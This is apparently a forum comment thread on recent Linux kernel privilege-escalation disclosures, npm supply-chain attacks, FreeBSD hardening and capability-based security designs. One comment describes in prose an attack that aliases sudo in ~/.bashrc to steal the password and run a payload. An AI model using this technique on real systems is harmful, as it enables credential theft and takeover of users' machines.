I switched to llama.cpp because of that.
To me it feels more and more that the slopcode world is the opposite philosophy of reproducible builds. It's like the anti methodology of how to work in that regard.
Before, everyone was publishing breaking changes in subminor packages because nobody adhered to any API versioning system standards. Now it's every commit that can break things. That is not an improvement.
When I see pages of obviously generated prose being submitted as any kind of documentation, my eyes just glaze over. I feel so guilty sharing similar stuff too, though to my credit, at least I always lead with a self-written TLDR, the slop is just for reference. But it's so bad, like genuinely distressing tier. I don't want to read all that junk, and more and more gets produced.
Prose type docs have always been my Achilles heel, and this is like the worst possible evolution of that.
For a brief period in the past few weeks, they somehow managed to make a change to ChatGPT Thinking that made it succinct. The tone was super fact-oriented too. It was honestly like waking up from a fever dream.
> Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution.
I had to do a double take reading that. It’s written as if something happened that prevented them from following the schedule, yet seemingly they chose to release the information anyway. I hope I’m missing something, like it being forcibly disclosed elsewhere.
Edit: Moments later I refreshed the homepage and saw the announcement. They do claim to have consulted with maintainers
Very odd wording. I assume there’s an interesting/upsetting story here that will come out soon.
the idea that it exists at all is more or less a gentleman's agreement in the engineering world anyway
Especially for a project like the kernel, there's no reasonable way to decide who out of thousands of interested parties should have access first.
Android is a rare exception, as of a few years ago they started a program where phone manufacturers get very favorable early access to AOSP code 4 months ahead of public release.
I don't doubt that the patch reversal + exploit PoC made by a third party is the result of people figuring out how patches work in open source projects like these.
Anyone with access to a good enough LLM can scour through supposedly minor bug fixes that might hide a critical vulnerability rather than doing it all manually. The LLM will probably throw up tons of false positives and miss half the issues, but you only need one or two successes.
With FreeBSD there's never any question of "who should this get reported to".
Not sure what you mean by this. Debian is able to handle coordinated disclosures (when they're actually coordinated), and get embargoed security updates out rapidly without breaking the embargo.
Is there some other aspect of this that you're referencing?
> we're in a similar space -- http://www.getdropbox.com (and part of the yc summer 07 program) basically, sync and backup done right (but for windows and os x). i had the same frustrations as you with existing solutions.
> let me know if it's something you're interested in, or if you want to chat about it sometime.
>drew (at getdropbox.com)
I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
For local attackers there may be easier avenues to leak the ASLR slide, but for remote attackers it's almost universally agreed it significantly raises the bar.
>I don't think it's reasonable to say that an OS that lacks it isn't "serious" about security.
When they implemented it in 2019 it had been an 18-year-old mitigation. If you are serious about security, you implement everything that raises the bar. The term "defense-in-depth" exists for a reason, and ASLR is probably one of the easiest and most effective defense-in-depth measures you can implement that doesn't necessarily require changes from existing code other than compiling with -pie.
FreeBSD isn’t secure, I suspect you’re sitting on a pile of 0 days for it?
1. No strong stack protectors.
2. No kASLR.
That's 20-year-old exploit methodology.
They are completely independent operating systems with a distant shared history.
Whereas on Linux, the distros are taking a common Linux kernel source, and combining it with their choice of common userlands like GNU. Debian has the same kernel and GNU userland that Arch and Fedora use. You could take a program compiled for Debian and run it on Arch, which is common these days due to Docker where you're pulling another distro's userland and running it on your distro's kernel. That is how Linux distros are "distros" whereas the BSDs are independent operating systems.
I kid, I kid...
That being said, I'm not suggesting that anyone should judge an entire OS based off of how they handle a single minor report, since everything else that I've seen suggests that FreeBSD takes security reports quite seriously. But then you could also use this same argument for the Linux kernel bug, since it's pretty rare for a patch to be mismanaged like this there too :)
[0]: https://www.maxchernoff.ca/p/luatex-vulnerabilities#timeline
So the issue is bigger than the mishandling of a single issue, it’s a fundamental process issue around security for one of the most impactful projects in the entire space.
Not everyone installs only what is available in pkgsrc.
https://lwn.net/Articles/850098
https://news.ycombinator.com/item?id=26507507
tl;dr: deeply insecure WireGuard implementation committed directly into the FreeBSD kernel with zero review.
Was this process problem fixed?
The preference is for usability over security.
Famously: https://vez.mrsk.me/freebsd-defaults
I appreciate your work on the project, but I can’t in good conscience suggest people switch while there are such bad defaults.
In general everything needs to be compiled for FreeBSD, but the ports collection is quite extensive. For example you will find Firefox, wayland, GNOME, KDE, xfce, … even dotnet was on there.
Problems arise with proprietary stuff like Spotify, Widevine DRM etc. However, FreeBSD has a Linux emulation layer (providing syscalls), dubbed ‘Linuxulator’. I managed to run the Spotify Linux desktop client but the Spotify website wouldn’t let me log in, didn’t research further. AFAIK the emulator is limited though, not implementing all syscalls.
There is also podman for FreeBSD and in addition to running FreeBSD containers (using Jails under the hood I guess?) it can run Linux containers as well (using the Linuxulator in addition then?).
It also comes with a hypervisor called bhyve if you want to run VMs
There is a handbook on their website describing how to set up a system (including desktop environment) if you want to give it a go.
Once noticed, that's where the exploit explosion erupts, excited exploiters everywhere, emboldened... enticed... excessively encouraged, by your delayed updates.
Attackers can’t push a security update without going through the reporting process (e.g. Github CVE), so they can’t necessarily abuse that easily.
If it does, doesn't that defeat the purpose? If a package is compromised, of course the compromiser will just label their new version as a "security update".
Why would it? Then an attacker would just push compromised code as a "security update". Since the majority of these npm attacks are account-based, the attacker can do everything the actual owner could.
https://github.com/artifact-keeper
An artifact manager. Only get what you approve. So you can get fast updates when needed and consistently known stable when you need it. Does need a little config override - easy work.
I had my own janky tooling for something like it. This is a good project.
If no one is willing to stand up and say "yes this is safe and of acceptable quality", why use it?
It's a software engineering version of the professional engineering stamp.
Also, IME we don't deep dive everything (should we?)
For most stuff we make sure the latest is not-shit and passed test cases. We do have ceremony around version bumps.
Another model is Perl's CPAN where you publish source files only.
Reviewing upstream diffs for every package requires a lot of man hours, and most packagers are volunteers. I guess LLMs might help catch some obvious cases.
This naturally doesn't work outside corporations.
I know this is unrelated to the article, but related to the title.
They’re always racing to be the first one to write an article about a case.
We set up our base containers with all the external dependencies already in them and then only update those explicitly when we decide it's time.
This means we might be a bit behind the bleeding edge, but we're also taking on a lot less risk with random supply chain vulns getting instant global distribution.
From TFA:
> Right now would be one of the best times for a supply chain attack via NPM to hit hard.
Given the local kernel root exploits, people pulling npm dependencies have an extra high chance of getting rooted. This includes test systems, build systems, the web server running node.js backend, etc. etc. etc.
This means that there is a significantly greater chance that whatever software you download (not necessarily npm-based) on the internet in these couple days has been unknowingly infected with backdoors, simply due to the fact that the vast majority of servers out there that use npm code have easily exploitable vulnerabilities.
That's why I don't understand:
> If everyone starts waiting a week, their exploits will wait 2 weeks
It's much easier to break into an NPM/Github account and push malicious commits in the few hours a maintainer is sleeping than it is to push something out and not have it noticed for 2 weeks.
There are lists of attacks which had an exposure window which was much shorter than 2 weeks:
https://daniakash.com/posts/simplest-supply-chain-defense/ https://blog.yossarian.net/2025/11/21/We-should-all-be-using...
Say hypothetically that 20% of attacks slip through, which is still worrying; you can mitigate 80% of attacks by just waiting a week. It's a low-risk, high-reward strategy.
Just alias sudo to sudo-but-also-keep-password-and-execute-a-payload in ~/.bashrc and wait up to 24 hours. Maybe also simulate some breakage by intercepting other commands and force the user to run 'sudo systemctl' or something sooner rather than later.
This is only scary for rootless containers as it skips an isolation layer, but we've started shipping distroless containers which are not vulnerable to this, due to the fact that they lack privilege escalation commands such as su or sudo.
never trust software to begin with, sandbox everything you can and don't run it on your machine to begin with if possible.
I won't enter into all the details but... It's totally possible to not have the sudo command (or similar) on a system at all and to have su with the setuid bit off.
On my main desktop there's no sudo command there are zero binaries with the setuid bit set.
The only way to get root involves an "out-of-band" access, from another computer, that is not on the regular network [1].
This setup has worked for me for years. And years. And I very rarely need to be root on my desktop. When I do, I just use my out-of-band connection (from a tiny laptop whose only purpose is to perform root operations on my desktop).
For example today: I logged in as root and blocked the three modules with the "dirty page" mitigation suggested by the person who reported the exploit.
You're not faking sudo with a mocking-bird on my machine. You're not using "su" from a regular user account. No userns either (no "insmod", no nothing).
Note that it's still possible to have several non-root users logged in at once: but from one user account, you cannot log in as another. You can however switch to TTY2, TTY3, etc. and log in as another user. And the whole XKCD about "get local account, get everything of importance" ain't valid either in my case.
I'm not saying it's perfect but it's not as simple as "get a local shell, wait until user enters 'sudo', get root". No sudo, no su.
It's brutally simple.
And, best of all, it's a fully usable desktop: I've been using such a setup for years (I've also got servers, including at home, with Proxmox and VMs etc., but that's another topic).
Most people however aren't and will happily run sudo after an npm postinstall script tells them to apt-install turboencabulator for their new frontend framework to function.
But they all have something in common: the issue is that your user is compromised, which means the applications running as that user are compromised. The only thing you gain is that you can trust your system, i.e. that the system itself is not compromised, which is only relevant for infrastructure; if your user is compromised you're already fucked. Multi-user setups with untrusted accounts are inherently insecure, and in infrastructure the blast radius might be thousands of users of the service in question.
the breakdown looks something like this:
- you heavily compromise a single user <- exploit not relevant
- you compromise a shared setup via a bad user to compromise a lot of users <- should never be used anymore, namespace isolation is the replacement
- you somewhat compromise a lot of users via infra compromise <- where this hurts

That's my main reason to use "sudo" on the desktop.
I suppose I could install every piece of software locally, either from source or via flatpak, but this is a lot of work and much harder than doing it the easy way and using global install via my distro. Plus, non-distro installs are much more likely to be out of date and contain vulnerabilities of their own.
But there are a lot of academic and research institutions that actually do have good Linux user management. I worked at a pediatric hospital, and the RHEL HPC admins did not mess around in terms of who was allowed to access which patients' data. As someone who was not an admin, it was a huge pain and it should have been. So this bug has pretty serious implications, seems like anyone at that hospital can abscond with a lot of deidentified data. [research HPC not as sensitive as the clinical stuff, which I think was all Windows Server]
Infecting sudo just makes for a quick demo.
If your container has different processes at different user ids, the exploit would still be effective.
It would likely also be able to “modify” read only files mapped from the host.
Something that concerns me more is I use things like gemini-cli or claude-cli via their own, non-sudo accounts with no ssh keys or anything on my laptop, but an LPE means they can find a way around such restrictions if they feel like it (and they might).
But it was too convenient. Anyone warning about it or trying to limit the damage was shouted down by people who had no experience of any other way of doing things. "import antigravity" is just too easy to do without.
Well, now we're reaching the "find out" part of the process I guess.
Assuming we survive the gap period where every country chucks what they still have at their worst enemies, I mean. I suppose we can always hit each other with animal bones.
This is one force that operates. Another is that, in an effort to avoid depending on such a big attack surface, people are increasingly rolling their own code (with or without AI help) where they might previously have turned to an open source library.
I think the effect will generally be an increase in vulnerabilities, since the hand-rolled code hasn't had the same amount of time soaking in the real world as the equivalent OSS library; there's no reason to assume the average author would magically create fewer bugs than the original OSS library authors initially did. But the vulnerabilities will have much narrower scope: If you successfully exploit an OSS library, you can hack a large fraction of all the code that uses it, while if you successfully exploit FooCorp's hand-rolled implementation, you can only hack FooCorp. This changes the economic incentive of finding vulnerabilities to exploit -- though less now than in the past, when you couldn't just point an LLM at your target and tell it "plz hack".
Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
For supply chain security and bug count, I'll take a focused custom implementation of specific features over a library full of generalized functionality.
> Also, even seemingly trivial libraries can have bugs. The infamous leftpad library didn't handle certain edge cases properly.
This isn't really an argument in favour of having the average programmer reimplement stuff, though. For it to be, you'd have to argue that the leftpad author was unusually sloppy. That may be true in this specific case, but in general, I'm not persuaded that the average OSS author is worse than the average programmer overall. IMHO, contributing your work to an OSS ecosystem is already a mild signal of competence.
On the wider topic of reimplementation: Recently there was an article here about how the latest Ubuntu includes a bunch of coreutils binaries that have been rewritten in Rust. It turns out that, while this presumably reduced the number of memory corruption bugs (there was still one, somehow; I didn't dig into it), it introduced a bunch of new vulnerabilities, mostly caused by creating race conditions between checking a filesystem path and using the path for something.
Because it might grow in future and you want to allow flexibility for that; because it might be the input to or output from some external system that requires XML; because your team might have standardised on always using XML config files; because introducing yet another custom plain-text file format just creates unnecessary cognitive load for everyone who has to use it. Those are real-world reasons I can think of.
But really I was just looking for a concrete example where I know the complexity of the implementation has definitely caused vulnerabilities, whether or not the choice to use it to solve the problem at hand was sensible. I have zero love for XML.
The race conditions were indeed TOCTOU bugs. In a sense, the bugs were a result of incorrectly handling shared mutable data, though in this case the mutations were external to Rust.
    module.exports = leftpad;

    function leftpad (str, len, ch) {
      str = String(str);
      var i = -1;
      ch || (ch = ' ');
      len = len - str.length;
      while (++i < len) {
        str = ch + str;
      }
      return str;
    }
A newer version was: https://github.com/left-pad/left-pad/blob/master/index.js which cached common cases and improved on the loop performance, before String.prototype.padStart() became a thing: https://www.npmjs.com/package/string.prototype.padstart

Both old and new versions return a string longer than `len` if the padding char is multiple characters, e.g. leftpad('a', 3, '&&&&') will be longer than 3. That feels like it shouldn't happen.
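The overshoot is easy to reproduce; here's the original leftpad logic (copied from the snippet above so it runs standalone) with the multi-character pad case:

```javascript
// Original leftpad logic: pads by prepending `ch` wholesale,
// without ever checking the length of `ch` itself.
function leftpad(str, len, ch) {
  str = String(str);
  var i = -1;
  ch || (ch = ' ');
  len = len - str.length;
  while (++i < len) {
    str = ch + str;
  }
  return str;
}

// With a 4-character pad, each loop iteration adds 4 chars,
// so the result blows past the requested length of 3.
console.log(leftpad('a', 3, '&&&&'));        // '&&&&&&&&a'
console.log(leftpad('a', 3, '&&&&').length); // 9, not 3

// The single-character case behaves as expected.
console.log(leftpad('7', 3, '0'));           // '007'
```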
Have you read this old code? It's terrible, often written in C with no care at all for security. AI is much, much better at writing code.
But I think most OSS code isn't like this -- even C code born long ago, if it's still in wide use, has been hardened by now. Examples: Linux kernel, GNU userland, PostgreSQL, Python.
There have been two LPE vulnerabilities and exploits in the Linux kernel announced today, after the one announced just last week. I don't think as much of the C code born long ago has been as carefully hardened as you think.
(Copy Fail 2 and Dirty Frag today, and Copy Fail last week)
You (anyone, not you personally) write that much code yourself and let's see how well you did in comparison.
Admittedly, not hard to do, but it could save some other folks.
Rivers caught on fire for a hundred years before the EPA was formed.
If I'm to be offended by a single thing in your post, it's being called an AI bro. That was undeserved, and cannot be farther from the truth. Not to miss the fact that your comment is entirely off topic; perhaps you see AI bros everywhere now.
We're seeing maintainers retreat from maintaining because the amount of AI slop being pushed at them is too much. How many are just going to hand over the maintenance burden to someone else, and how many of those new maintainers are going to be evil?
The essential problem is that our entire system of developing civilisation-critical software depends on the goodwill of a limited set of people to work for free and publish their work for everyone else to use. This was never sustainable, or even sensible, but because it was easy we based everything on it.
We need to solve the underlying problem: how to sustainably develop and maintain the software we need.
A large part of this is going to have to be: companies that use software to generate profits paying part of those profits towards the development and maintenance of that software. It just can't work any other way. How we do this is an open question that I have no answers for.
This is opposed to closed-off “products” that change at the whims of the company owning them.
There’s a lot of misconception about how open source comes to be; only a small part of it, still significant of course, was really created for the benefit of a community. There are exceptions, but dig into the organisational culture and origins and you’ll see the pattern. Also, thousands of projects are made for the satisfaction of the author himself, being highly intelligent and high on algorithmic dopamine.
this is a cornerstone of modern software development. If it died, or if got taken over by a malicious entity, every single company on the planet would have an immediate security problem. Yet the experience of that maintainer is bad verging on terrible [1].
We need to do better than this.
>He emphasized that he has released curl under a free license, so there is no legal problem with what these companies are doing. But, he suggested, these companies might want to think a bit more about the future of the software they depend on.
There is little reason for minimal-restriction licenses to exist other than to allow corporate use without compensation or contribution. I would think by now that any hope that they would voluntarily be any less exploitative than they can would have been dashed.
If you aren't getting paid or working purely for your own benefit, use a protective license. Though, if thinly veiled license violation via LLM is allowed to stand, this won't be enough.
There's a bunch of problems with getting companies to pay for this, too - that sense of entitlement (or even contractual obligation), the ability to control the project with cash, etc.
I don't have any answers or solutions. But I don't think we can hand-wave the problem away.
Like you get when you buy e.g. MS products?
/s
I don't agree with any of that.
Nuclear might be airgapped but what about water, power…?
* with internet access to FOSS via sourceforge and github we got an abundance of building blocks
* with central repositories like CPAN, npm, pip, cargo and docker those building blocks became trivially easy to use
Then LLMs and agents added velocity to building apps and producing yet more components, feeding back into the dependency chain. Worse: new code with unattributed reuse of questionable patterns found in unknowable versions of existing libraries. That is, implicit dependencies on fragments of a multitude of packages.
This may all end well ultimately, but we're definitely in for a bumpy ride.
Auto-installing random software is the problem. It was a problem when our parents did it, why would it be a good idea for developers to do it?
yolo!
I run a distro that often causes software like this to break because their silent automatic installation typically makes assumptions about Linux systems which don’t apply to mine. However I fear for the many users of most typical distros (and other OS’ in general as it’s not just a Linux-only issue) who are subject to having all sorts of stuff foisted onto their system with little to no opportunity to easily decide what is being heaped upon them.
(Obviously some developers are better or worse than others, so I presume your observation is assuming developer skill as a constant.)
Right now it kinda feels to me like "Open Source" is the Russian army, relying on their sheer numbers and their huge quantity of equipment, much of which is decades old.
Meanwhile attackers and bug hunters are like the Ukrainians, using new, inexpensive, and surprisingly powerful tools that none of the Open Source community has ever seen in the past, and for which it has very little defence capability.
The attackers with cheap drones or LLMs are completely overwhelming the old school who perhaps didn't notice how quickly the world has changed around them, or did notice but cannot do anything about quickly enough.
Who exactly is the innocent little Ukraine supposed to be that the big bad open source is supposed to be attacking, to, what, take their land and make the OSS leader look powerful and successful at achieving goals to distract from their fundamental awfulness? And who is the North Korean cannon fodder purchased by OSS while we're at it?
Yeah it's just like that, practically the same situation. The authors of gnu cp and ls can't wait to get, idk, something apparently, out of the war they started when they attacked, idk, someone apparently.
> any useful piece of software has been fuzz tested, property tested and formally verified.
That would require effort. Human effort and extra token cost. Not going to happen; people would rather move fast and break things.
More people are producing more code because of easier tools. Most code is bad. But that's not the tools fault.
And in the end it is a problem of processes and culture.
I am not disagreeing in the main, but I wonder about the net effect. Again, this is total speculation on my part. If I vibe-slop a half dozen apps this week (and I might, just you watch), the overall raw code quality in the universe got worse. But if in the space of the same time, two major security holes got patched (assume there was no net amount of code changed), didn't things actually get better?
We should have:
- OS level capabilities. Launched programs get passed a capability token from the shell (or wherever you launched the program from). All syscalls take a capability as the first argument. So, "open path /foo" becomes open(cap, "/foo"). The capability could correspond to a fake filesystem, real branch of your filesystem, network filesystem or really anything. The program doesn't get to know what kind of sandbox it lives inside.
- Library / language capabilities. When I pull in some 3rd party library - like an npm module - that library should also be passed a capability too, either at import time or per callsite. It shouldn't have read/write access to all other bytes in my program's address space. It shouldn't have access to do anything on my computer as if it were me! The question is: "What is the blast radius of this code?" If the library you're using is malicious or vulnerable, we need to have sane defaults for how much damage can be caused. Calling lib::add(1, 2) shouldn't be able to result in a persistent compromise of my entire computer.
SeL4 has fast, efficient OS level capabilities. It's had them for years. They work great. They're fast - faster than linux in many cases. And tremendously useful. They allow for transparent sandboxing, userland drivers, IPC, security improvements, and more. You can even run linux as a process in sel4. I want an OS that has all the features of my linux desktop, but works like SeL4.
Unfortunately, I don't think any programming language has the kind of language level capabilities I want. Rust is really close. We need a way to restrict a 3rd party crate from calling any unsafe code (including from untrusted dependencies). We need to fix the long standing soundness bugs in rust. And we need a capability based standard library. No more global open() / listen() / etc. Only openat(), and equivalents for all other parts of the OS.
If LLMs keep getting better, I'm going to get an LLM to build all this stuff in a few years if nobody else does it first. Security on modern desktop operating systems is a joke.
Those exploits are in the kernel, and the userspace is only making normal, allowed calls. Replacing global open()/listen()/etc. with capability-based versions would still allow one to invoke the same kernel bugs.
(Now, using a microkernel like seL4 where the kernel drivers are isolated _would_ help, but (1) that's independent from what userspace does, you can have a POSIX layer with seL4, and (2) that would be way more context switches, so a performance drop.)
Yes they would. Copyfail uses a bug in the linux kernel to write to arbitrary page table entries. A kernel like SeL4 puts the filesystem in a separate process. The kernel doesn't have a filesystem page table entry that it can corrupt.
Even if the bug somehow got in, the exploit chain uses the page table bug to overwrite the code in su. This can be used to get root because su has suid set. In a capability based OS, there is no "su" process to exploit like this.
A lot of these bugs seem to come from linux's monolithic nature meaning (complex code A) + (complex code B) leads to a bug. Microkernels make these sort of problems much harder to exploit because each component is small and easier to audit. And there's much bigger walls up between sections. Kernel ALG support wouldn't have raw access to overwrite page table entries in the first place.
> (2) that would be way more context switches, so a performance drop
I've heard this before. Is it actually true though? The SeL4 devs claim the context switching performance in sel4 is way better than it is in linux. There are only 11 syscalls - so optimising them is easier. Invoking a capability (like a file handle) in sel4 doesn't involve any complex scheduler lookups. Your process just hands your scheduler timeslice to the process on the other end of the invoked capability (like the filesystem driver).
But SeL4 will probably have more TLB flushes. I'm not really sure how expensive they are on modern silicon.
I'd love to see some real benchmarks doing heavy IO or something in linux and sel4. I'm not really sure how it would shake out.
I prefer its model of declaring "this is what I want to use"; any calls to code outside that error out.
- Pledge requires the program drop privileges. Process level caps move the "allowed actions" outside of an application. And they can do that without the application even knowing. This would - for example - let you sandbox an untrusted binary.
- Pledge still leaves an entire application in the same security zone. If your process needs network and disk access, every part of the process - including 3rd party libraries - gets access to the network and disk.
- You can reproduce pledge with caps very easily. Capability libraries generally let you make a child capability. So, cap A has access to resources x, y, z. Make cap B with access to only resource x. You could use this (combined with a global "root cap" in your process) to implement pledge. You can't use pledge to make caps.
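Attenuation (deriving cap B from cap A) is the key primitive in that last point. A toy sketch in JavaScript, with all names made up for illustration:

```javascript
// Derive a weaker capability exposing only a subset of the parent's
// operations. The child delegates to the parent, so restricting
// authority never requires touching the underlying resource.
function attenuate(parentCap, allowedOps) {
  const child = {};
  for (const op of allowedOps) {
    if (typeof parentCap[op] !== 'function') {
      throw new Error('parent capability lacks: ' + op);
    }
    child[op] = (...args) => parentCap[op](...args);
  }
  return Object.freeze(child);
}

// Parent cap A grants read and write; child cap B grants read only.
const capA = {
  read: () => 'contents',
  write: (data) => { /* ...persist data... */ },
};
const capB = attenuate(capA, ['read']);

capB.read();  // works
// capB.write is simply undefined: the authority isn't there. That's
// the pledge-like "drop privileges" effect, except imposed from
// outside the code that receives capB.
```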
To me it’s easier to get a program to let the system know what it needs vs. try to contain it from the outside.
Anyway, have a good one.
One approach is "Trust No Code" and the other is "Trusted code should run safely".
The first one sounds better on paper, but leads to a very complicated system. That said, I haven't worked with jails much or other forms of sandboxing. It just seems to me that to make software function you need escape hatches, and the more of those you have, well, now you're back to plugging exploits with a more complicated system.
It was interesting to me to hear that even though OpenBSD had designed their software to limit permissions even before pledge and unveil were released - upon release they found that a shocking amount of their software actually wasn't following their own rules.
https://blog.plan99.net/why-not-capability-languages-a8e6cbd...
But as pointed out by others, this particular exploit wouldn't be stopped by capabilities. Nor would it be stopped by micro-kernels. The filesystem is a trusted entity on any OS design I'm familiar with as it's what holds the core metadata about what components have what permissions. If you can exploit the filesystem code, you can trivially obtain any permission. That the code runs outside of the CPU's supervisor mode means nothing.
The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
This essay only addresses my second point - capabilities within a program. It doesn't address OS level capabilities at all.
But even in the space of programming languages, I find this essay extremely unconvincing. Like, you raise points like this:
> Here are some problems you’ll have to solve in order to sandbox libraries: What is your threat model? How do you stop components tampering with each other’s memory?
The threat model is left-pad cryptolockering your computer via a supply chain attack. The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
You stop components tampering with each others' memory by using a memory safe language.
> its main() method must be given a “god object” exposing all the ambient authorities the app begins with
So what? The main function already takes arguments. I don't understand the problem.
Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
Then there's these weird claims:
> Any mutable global variable is a problem as it may allow one component to violate expectations held by another.
You don't need to ban mutable global variables! Let's imagine we did this in safe Rust. I think the only constraint is that a global variable can't be shared over the boundary between crates. But - nobody does that anyway. Even if you did share a global over a crate boundary, the child crate would still only be able to access it through methods on the type.
Sneaky developers could leverage globals to violate the security boundary. But it would be hard to do by accident. Maybe just, don't do that.
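To make that concrete, here's a tiny safe-Rust sketch (a single file for illustration; imagine the `counter` module as its own crate). The global exists, but nothing outside the module can name it directly; all access funnels through a small audited API.

```rust
mod counter {
    use std::sync::atomic::{AtomicU64, Ordering};

    // Not `pub`: no other module (or crate) can reach this static directly.
    static HITS: AtomicU64 = AtomicU64::new(0);

    // The only doorway to the global. Returns the new count.
    pub fn record_hit() -> u64 {
        HITS.fetch_add(1, Ordering::Relaxed) + 1
    }

    pub fn hits() -> u64 {
        HITS.load(Ordering::Relaxed)
    }
}

fn main() {
    let a = counter::record_hit();
    let b = counter::record_hit();
    assert_eq!(b, a + 1);
    // counter::HITS.store(999, ...);  // would not compile: HITS is private
}
```

The point being: the mutable global itself isn't the hazard; uncontrolled access to it across a trust boundary is, and Rust's module privacy already forces access through methods.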
Your essay talks about some research project making a capability-based Java subset. And I understand that the resulting ergonomics weren't very good. But that isn't evidence that capabilities themselves are a bad idea. If a research student wrote a half-baked C compiler one time, you wouldn't take that as evidence that C compilers are a bad idea. I do, however, accept that the burden of proof is on me to demonstrate that it's a good idea. I hope that I can some day rise to that challenge.
> The filesystem is a trusted entity on any OS design I'm familiar with
That's not how capability-based microkernels like seL4 work. The filesystem is owned by a specialised process. Other processes only modify files by sending messages to the filesystem process via a capability handle. If nobody created a writable file handle, the file can't be arbitrarily mutated by another module. Copyfail happened because in Linux, any code can by default interact with the page table. One piece of code was missing access control checks. In capability-based systems, it's basically impossible to accidentally forget access control checks like that.
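A toy sketch of that handle discipline (not real seL4 APIs; `FsTask` and `Handle` are invented here): files are reachable only through handles handed out by a filesystem task, and the handle's type decides which requests it can even express.

```rust
use std::collections::HashMap;

// Stand-in for a userspace filesystem task.
struct FsTask {
    files: HashMap<String, String>,
}

// A capability handle to one file. Write authority is part of the type.
enum Handle<'a> {
    ReadOnly(&'a str),
    ReadWrite(&'a str),
}

impl FsTask {
    fn read(&self, h: &Handle) -> Option<&String> {
        match h {
            Handle::ReadOnly(path) | Handle::ReadWrite(path) => self.files.get(*path),
        }
    }

    // A mutation is only expressible with a ReadWrite handle; there is
    // no code path from a ReadOnly handle to a write.
    fn write(&mut self, h: &Handle, data: &str) -> Result<(), &'static str> {
        match h {
            Handle::ReadWrite(path) => {
                self.files.insert(path.to_string(), data.to_string());
                Ok(())
            }
            Handle::ReadOnly(_) => Err("handle carries no write authority"),
        }
    }
}

fn main() {
    let mut fs = FsTask {
        files: HashMap::from([("etc/passwd".to_string(), "root:x:0".to_string())]),
    };
    let ro = Handle::ReadOnly("etc/passwd");
    assert!(fs.write(&ro, "evil").is_err()); // no writable handle, no mutation
    assert_eq!(fs.read(&ro).unwrap(), "root:x:0");
}
```

There's no check a caller can "forget" here: forgetting to create a writable handle fails closed, which is the property the comment is pointing at.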
> The only techniques we have to stop bugs like this are garbage collection or use of something like Rust's affine type system. You could in principle write a kernel in a language like C#, Java or Kotlin and it would be immune to these sorts of bugs.
Copyfail is a logic bug. C#, Java or Kotlin wouldn't save you from it at all.
> The solution is to design a language such that if I import leftpad, then call it, my computer can't get hacked.
That requirement may seem clear right now, but the moment you talk to other people about your language you'll find there's no agreement on what "get hacked" means. Some people will consider calling exit(0) repeatedly to be "hacked" because it's a DoS attack, others will say no code execution or priv escalation happened, so that's not being hacked. Some will say that left-pad being able to read arbitrary bytes from your address space is being hacked, others will say no harm done and thus it wasn't being hacked. The details matter and you need to nail them down in advance.
It turns out for example that one of the top uses of the Java SecurityManager was just to stop plugins accidentally calling System.exit() and tearing down the whole process. It wasn't even a security goal, really.
> You stop components tampering with each others' memory by using a memory safe language.
That's not enough. See languages like Ruby or JavaScript, which are memory safe but not sandboxable due to all the monkeypatching they allow.
> Haskell already passes a type object as an argument to anything which does IO. They don't do it for security. Turns out having pure functions separated from non-pure functions is a beautiful thing.
But almost nobody uses Haskell, partly because of poor ergonomics like this! So if you want a language that gets wide usage and has a good library ecosystem, monads for everything probably isn't going to take off.
> If nobody created a writable file handle, the file can't be arbitrarily mutated by another module.
We're talking about critical bugs in the filesystem, so what the FS process's idea of a file handle is doesn't really matter. If you can confuse or buffer-overflow the FS process by sending it messages, you can then edit state inside that process you weren't supposed to be able to access, and as that process controls the security system for everything, it's game over. Microkernels have no way to stop this, which is one reason very few operating systems move the core FS out into a separate process. You can't easily survive a crash of the core FS code, and it being exploited is equivalent to an exploit of the core microkernel anyway in terms of adversarial goals. So you might as well just run it in-kernel and reap the performance benefits.
> But almost nobody uses Haskell
Sad, but true
> partly because of poor ergonomics like this!
I'm somewhat dubious that's the reason, partly because I find such ergonomics excellent! Especially those provided by my capability system Bluefin: https://hackage.haskell.org/package/bluefin
Edit: and, ofc, what we're discussing here is Linux packages.
I have one server that has shell users, and I did the "yum update" and "reboot -f" dance last week.
Was that good enough? Oh no.
Here we go again!
All the arrogant asocial coder bros cast aside.
All the poorly reasoned shortcuts due to hustle culture and "git pull the world" engineering, while startups aura-farm on Twitter/social media about their cool sweatshop-labor-exploiting tech jobs...
Watching AI come around and the 2010s messes blow up in faces... chef's kiss
Hey it's all web-scale though! Good job!
Which is where the unserious emerges but in a subtle way; taking such unserious things so seriously is not serious behavior. It's anxious and paranoid, aloof and clueless behavior.
Secure in tech skills but unserious otherwise.
Lacking a broad set of skills will make office workers, unable even to grow a potato, inherently paranoid about their jobs.
What else do you expect, given the economic incentives on one side, and the immaturity of the discipline on the other? Writing robust software requires time, money and competence, in a purely empirical approach, since we have no fundamental theory of software. The pressure is for quantity and features in minimum time. The approaches are incompatible, and economics win every time.
It was merely untenable due to hardware limits and now outdated software development patterns.
Big data SaaS companies were never the end goal. They were a stepping stone to AI. A lab to test AI theory.
So your runway and moat so to speak were never real. Merely temporary science research.
I don't think the wealth should go to billionaires. Nor do I think your life should be spent dancing like a monkey to their organ, while you soothe your soul by convincing yourself it's for a greater good.
Perhaps your country should engage in substantive collective action. Because this whole time you were just a pawn of billionaires who don't know you exist. As such, they never cared about providing you assurances. You were just cheaper labor.
Big companies have security roles on multiple levels, enforcing policies and not allowing devs to just install any package. That's not new but started maybe 15 years ago.
One idea I've been entertaining is to not allow transitive imports in packages. It would probably lead to far fewer and more capable packages, and a bigger standard library. Much harder to imagine a left-pad incident in such an ecosystem.
They're not either, every one of these projects contains a gigantic vendor/ folder full of unmaintained libraries, modified so much that keeping up with the latest changes is impossible so they're stuck with whatever version they copied back in 2009.
there's nothing stopping you from using python from 2009 except why would you want to do that to yourself - but the same strategy applies. the reference python implementation is written in C, after all.
The problem is that the UNIX shell model got very successful and is now also used on other platforms with poor package management, so all the language-level packaging system were created instead. But those did not learn from the lessons of Linux distributions. Cargo is particularly bad.
